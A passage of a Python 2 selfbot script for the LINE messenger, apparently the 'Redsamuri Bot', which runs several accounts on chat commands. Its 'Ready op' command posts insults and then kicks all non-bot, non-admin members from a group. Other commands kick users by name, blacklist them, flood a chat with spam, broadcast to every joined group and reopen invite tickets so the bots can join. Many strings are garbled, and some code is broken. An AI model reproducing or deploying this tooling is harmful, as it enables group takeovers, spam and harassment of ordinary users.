cl.sendText(msg.to,strnum + "使人以下的�组用自动邀请拒�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"คำสั่งสำหรับ แอดมิน")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Proteksi⭐\n*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+=" Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n*============*\n⭐Redsamuri Bot⭐\n*============*"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#---------------------Sc invite owner ke group------
elif "/invitemeto: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("/invitemeto: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Red3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
elif msg.text == "จับ":
if msg.from_ in admin:
cl.sendText(msg.to, "จับตาดูคนแอบแล้ว")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "อ่าน":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||จับตาดูคนแอบ||%s\n||By : Redsamuri BOT||\n%s-=ชื่อของคนแอบมีดังนี้=-\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, " Redsamuri\nอ่าน\n ได้เท่านี้♪")
#-----------------------------------------------
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["เข้ามา","Red samuri","Join all"]: #Panggil Semua Bot
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Redsamuri join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Red1 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red2 join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red3 Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Red4 Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ks.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Bye Red","Bye all","bye all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["ออก"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red1"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red2"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red3"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Red4"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ks.leaveGroup(msg.to)
except:
pass
elif msg.text in ["1ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["2ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["3ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["4ออก"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ks.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Tag all","Tagall"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Redsamuribot Like Status Owner")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Redsamuri Bot Like Status Teman Boss")
cl.sendText(msg.to,"Redsamuri Bot Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"ขับไล่รายการที่ถูกแบน")
random.choice(KAC).sendText(msg.to,"Redbot Invite devil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Kontol Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
elif target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Njiiing?\nLemah Banget Nih Room")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
ks.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
ks.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
ks.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("Bc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot out","Red out"]:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sayonara")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-----------------End-----------
elif msg.text in ["Red say hi"]:
ki.sendText(msg.to,"Hi buddy Har Har")
kk.sendText(msg.to,"Hi buddy Har Har")
kc.sendText(msg.to,"Hi buddy Har Har")
ks.sendText(msg.to,"Hi buddy Har Har")
#-----------------------------------------------
elif msg.text in ["ขอมุข"]:
ki.sendText(msg.to,"เชิญแอดบอทน้อยเลยคับเจ้านาย")
kk.sendText(msg.to,"มีหมดทั้งมุขทั้งแคปชงแคปชั่น")
kc.sendText(msg.to,"ไอกีไลน์👉@botnoi👈")
elif msg.text in ["นับ1-100","นับเลข"]:
ki.sendText(msg.to,"ตูเป็นบอทป้องกันนะ")
kk.sendText(msg.to,"ไม่ใช่บอทเล่นตลก")
kc.sendText(msg.to,"เดะปั๊ดตบหัวทิ่ม")
elif msg.text in ["สวย","น่ารัก","จีบ"]:
ki.sendText(msg.to,"สะดุดตา นับตั้งแต่ เมื่อแรกพบ")
kk.sendText(msg.to,"อยากจะคบ นับตั้งแต่ เมื่อแรกเห็น")
kc.sendText(msg.to,"อยากได้น้อง มาเคียงข้าง ตัวเป็นๆ")
cl.sendText(msg.to,"แม่เนื้อเย็น พี่รักเจ้า จนหมดใจ😬😬")
elif msg.text in ["แคปชั่น"]:
ki.sendText(msg.to,"ถึงหน้าตาจะไม่หล่อ")
kk.sendText(msg.to,"แต่ถ้าลองคบแล้วน้องจะติดใจ")
kc.sendText(msg.to,"อ๊วกแพพ...😂😂")
elif msg.text in ["รับแขก"]:
ki.sendText(msg.to,"สวัสดีคับคนมาใหม่")
kc.sendText(msg.to,"มาใหม่แก้ผ้าด้วยนะ555+!")
#-----------------------------------------------
